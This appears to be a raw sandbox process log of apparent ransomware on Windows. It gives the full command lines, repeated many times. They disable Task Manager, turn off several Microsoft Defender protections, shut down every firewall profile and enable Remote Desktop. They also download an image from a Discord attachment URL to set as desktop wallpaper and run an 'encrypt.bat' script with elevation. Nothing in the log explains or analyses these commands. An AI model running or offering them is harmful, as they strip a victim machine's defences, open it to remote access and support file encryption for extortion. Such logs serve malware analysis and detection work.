reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

